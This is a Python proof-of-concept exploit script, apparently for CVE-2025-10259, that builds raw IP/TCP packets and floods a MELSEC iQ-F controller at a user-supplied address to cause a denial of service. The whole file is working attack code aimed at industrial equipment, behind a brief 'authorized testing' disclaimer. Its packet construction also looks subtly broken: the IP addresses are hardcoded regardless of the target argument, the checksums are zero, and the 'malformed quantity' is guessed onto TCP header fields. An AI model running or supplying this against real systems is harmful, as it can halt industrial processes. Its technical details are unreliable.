#!/usr/bin/env python3
"""
CVE-2025-10259 PoC - MELSEC iQ-F TCP DoS
Note: This is for educational and authorized testing purposes only.
"""
import socket
import struct
import sys
def create_malformed_tcp_packet():
"""Create a malformed TCP packet with invalid quantity field"""
# IP header
ip_src = socket.inet_aton('192.168.1.100') # Attacker IP
ip_dst = socket.inet_aton('192.168.1.200') # Target IP
ip_header = struct.pack('!BBHHHBBH4s4s',
0x45, # Version + IHL
0x00, # TOS
40, # Total Length
0x0000, # ID
0x4000, # Flags + Fragment Offset
64, # TTL
6, # Protocol (TCP)
0x0000, # Checksum
ip_src,
ip_dst
)
# TCP header with malformed fields
tcp_src_port = 12345
tcp_dst_port = 5000 # MELSEC default port
tcp_seq = 0xFFFFFFFF # Invalid sequence number (malformed quantity)
tcp_ack = 0x00000000
tcp_offset = 5 << 4 # Data offset
tcp_flags = 0x02 # SYN flag
tcp_window = 8192
tcp_checksum = 0x0000
tcp_urgent = 0xFFFF # Invalid urgent pointer (malformed quantity)
tcp_header = struct.pack('!HHLLBBHHH',
tcp_src_port,
tcp_dst_port,
tcp_seq,
tcp_ack,
tcp_offset,
tcp_flags,
tcp_window,
tcp_checksum,
tcp_urgent
)
return ip_header + tcp_header
def exploit(target_ip, target_port=5000):
"""Send malformed packets to trigger DoS"""
print(f'[*] Target: {target_ip}:{target_port}')
print('[*] Sending malformed TCP packets...')
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
packet = create_malformed_tcp_packet()
for i in range(10):
try:
sock.sendto(packet, (target_ip, target_port))
print(f'[+] Packet {i+1} sent')
except Exception as e:
print(f'[-] Error: {e}')
print('[*] Attack completed')
sock.close()
if __name__ == '__main__':
if len(sys.argv) < 2:
print(f'Usage: {sys.argv[0]} <target_ip> [port]')
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2]) if len(sys.argv) > 2 else 5000
exploit(target, port)